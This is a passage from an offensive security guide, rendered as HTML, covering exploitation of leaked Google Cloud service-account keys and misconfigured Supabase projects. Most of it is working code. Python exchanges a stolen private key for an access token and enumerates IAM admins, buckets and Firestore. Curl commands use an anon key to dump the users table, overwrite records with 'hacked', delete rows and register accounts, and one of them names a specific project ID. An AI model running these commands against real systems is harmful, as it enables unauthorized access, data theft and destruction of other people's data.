&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;aud&amp;#34;&lt;/span&gt;: sa_key[&lt;span style="color:#a6d189"&gt;&amp;#39;token_uri&amp;#39;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;iat&amp;#34;&lt;/span&gt;: now,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;exp&amp;#34;&lt;/span&gt;: now &lt;span style="color:#99d1db;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;3600&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; payload &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; base64&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;urlsafe_b64encode(json&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;dumps(claims)&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;encode())&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;rstrip(&lt;span style="color:#e78284"&gt;b&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;=&amp;#39;&lt;/span&gt;)&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;decode()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; key &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; load_pem_private_key(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sa_key[&lt;span style="color:#a6d189"&gt;&amp;#39;private_key&amp;#39;&lt;/span&gt;]&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;encode(), password&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;None&lt;/span&gt;, backend&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;default_backend()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; signature &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; base64&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;urlsafe_b64encode(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; key&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;sign(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;header&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;payload&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;encode(), pad&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;PKCS1v15(), hashes&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;SHA256())
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;rstrip(&lt;span style="color:#e78284"&gt;b&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;=&amp;#39;&lt;/span&gt;)&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;decode()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; resp &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;post(sa_key[&lt;span style="color:#a6d189"&gt;&amp;#39;token_uri&amp;#39;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;grant_type=urn:ietf:params:oauth:grant-type:jwt-bearer&amp;amp;assertion=&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;header&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;payload&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;signature&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;encode(),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; headers&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a6d189"&gt;&amp;#39;Content-Type&amp;#39;&lt;/span&gt;:&lt;span style="color:#a6d189"&gt;&amp;#39;application/x-www-form-urlencoded&amp;#39;&lt;/span&gt;}, timeout&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;10&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;return&lt;/span&gt; resp&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;json()[&lt;span style="color:#a6d189"&gt;&amp;#39;access_token&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# With the token, list IAM policy (find owners/admins)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;https://cloudresourcemanager.googleapis.com/v1/projects/&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;project_id&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;:getIamPolicy&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; headers&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a6d189"&gt;&amp;#39;Authorization&amp;#39;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;Bearer &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;token&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; binding &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;json()&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(&lt;span style="color:#a6d189"&gt;&amp;#39;bindings&amp;#39;&lt;/span&gt;, []):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; binding[&lt;span style="color:#a6d189"&gt;&amp;#39;role&amp;#39;&lt;/span&gt;] &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; [&lt;span style="color:#a6d189"&gt;&amp;#39;roles/owner&amp;#39;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#39;roles/editor&amp;#39;&lt;/span&gt;]:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;👑 &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;binding[&lt;span style="color:#a6d189"&gt;&amp;#39;role&amp;#39;&lt;/span&gt;]&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;binding[&lt;span style="color:#a6d189"&gt;&amp;#39;members&amp;#39;&lt;/span&gt;]&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# List Storage buckets&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;https://storage.googleapis.com/storage/v1/b?project=&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;project_id&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; headers&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a6d189"&gt;&amp;#39;Authorization&amp;#39;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;Bearer &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;token&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; bucket &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;json()&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(&lt;span style="color:#a6d189"&gt;&amp;#39;items&amp;#39;&lt;/span&gt;, []):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;📦 &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;bucket[&lt;span style="color:#a6d189"&gt;&amp;#39;name&amp;#39;&lt;/span&gt;]&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Test Firestore access&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;https://firestore.googleapis.com/v1/projects/&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;project_id&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/databases/(default)/documents&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; headers&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a6d189"&gt;&amp;#39;Authorization&amp;#39;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;Bearer &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;token&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;status_code &lt;span style="color:#99d1db;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;200&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#a6d189"&gt;&amp;#34;🔥 FIRESTORE ACCESSIBLE&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;hr&gt;
&lt;h2 id="11-supabase-exploitation" &gt;
&lt;div&gt;
&lt;a href="#11-supabase-exploitation"&gt;
#
&lt;/a&gt;
11. SUPABASE EXPLOITATION
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="111-what-it-is-and-how-to-find-it" &gt;
&lt;div&gt;
&lt;a href="#111-what-it-is-and-how-to-find-it"&gt;
##
&lt;/a&gt;
11.1 What it Is and How to Find It
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;Supabase is an open-source BaaS (Backend as a Service), alternative to Firebase. Uses PostgreSQL + REST API + Auth + Storage.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Indicators&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Headers: &lt;code&gt;sb-api-version&lt;/code&gt;, &lt;code&gt;x-sb-auth&lt;/code&gt;, &lt;code&gt;x-supabase&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;URL: &lt;code&gt;https://{project_id}.supabase.co&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;JS bundles: &lt;code&gt;supabaseUrl&lt;/code&gt;, &lt;code&gt;supabaseKey&lt;/code&gt;, &lt;code&gt;SUPABASE_ANON_KEY&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Domain: &lt;code&gt;*.supabase.co&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="112-anon-key--what-it-allows" &gt;
&lt;div&gt;
&lt;a href="#112-anon-key--what-it-allows"&gt;
##
&lt;/a&gt;
11.2 Anon Key — What It Allows
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;The &amp;ldquo;anon key&amp;rdquo; is a JWT found in JS bundles. With it, you can:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Read tables&lt;/strong&gt;: if Row Level Security (RLS) is not configured&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Write (INSERT/UPDATE/DELETE)&lt;/strong&gt;: if RLS doesn&amp;rsquo;t protect&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;SignUp&lt;/strong&gt;: if the email provider is enabled&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Storage&lt;/strong&gt;: read buckets with public policies&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="113-table-and-data-enumeration" &gt;
&lt;div&gt;
&lt;a href="#113-table-and-data-enumeration"&gt;
##
&lt;/a&gt;
11.3 Table and Data Enumeration
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f2d5cf"&gt;ANON_KEY&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f2d5cf"&gt;PROJECT&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;gfgmuezavgzjmaxhflsu&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# List ALL tables (if RLS is broken) — test common names&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; table in users profiles posts products orders &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; clients companies messages conversations &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; relatorios relatorio purchase etapa; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://&lt;/span&gt;&lt;span style="color:#a6d189"&gt;${&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;PROJECT&lt;/span&gt;&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.supabase.co/rest/v1/&lt;/span&gt;&lt;span style="color:#a6d189"&gt;${&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;table&lt;/span&gt;&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;?limit=1&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;apikey: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;${&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;ANON_KEY&lt;/span&gt;&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Authorization: Bearer &lt;/span&gt;&lt;span style="color:#a6d189"&gt;${&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;ANON_KEY&lt;/span&gt;&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; | head -c &lt;span style="color:#ef9f76"&gt;200&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;echo&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Table dump (if accessible)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://&lt;/span&gt;&lt;span style="color:#a6d189"&gt;${&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;PROJECT&lt;/span&gt;&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.supabase.co/rest/v1/users?select=*&amp;amp;limit=100&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;apikey: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;${&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;ANON_KEY&lt;/span&gt;&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Authorization: Bearer &lt;/span&gt;&lt;span style="color:#a6d189"&gt;${&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;ANON_KEY&lt;/span&gt;&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Test UPDATE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -X PATCH &lt;span style="color:#a6d189"&gt;&amp;#34;https://&lt;/span&gt;&lt;span style="color:#a6d189"&gt;${&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;PROJECT&lt;/span&gt;&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.supabase.co/rest/v1/etapa?id=eq.1&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;apikey: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;${&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;ANON_KEY&lt;/span&gt;&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Authorization: Bearer &lt;/span&gt;&lt;span style="color:#a6d189"&gt;${&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;ANON_KEY&lt;/span&gt;&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Content-Type: application/json&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Prefer: return=minimal&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#39;{&amp;#34;status&amp;#34;:&amp;#34;hacked&amp;#34;}&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Test DELETE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -X DELETE &lt;span style="color:#a6d189"&gt;&amp;#34;https://&lt;/span&gt;&lt;span style="color:#a6d189"&gt;${&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;PROJECT&lt;/span&gt;&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.supabase.co/rest/v1/relatorio?id=eq.1&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;apikey: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;${&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;ANON_KEY&lt;/span&gt;&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Authorization: Bearer &lt;/span&gt;&lt;span style="color:#a6d189"&gt;${&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;ANON_KEY&lt;/span&gt;&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# SignUp (if open)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -X POST &lt;span style="color:#a6d189"&gt;&amp;#34;https://&lt;/span&gt;&lt;span style="color:#a6d189"&gt;${&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;PROJECT&lt;/span&gt;&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.supabase.co/auth/v1/signup&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;apikey: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;${&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;ANON_KEY&lt;/span&gt;&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Content-Type: application/json&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
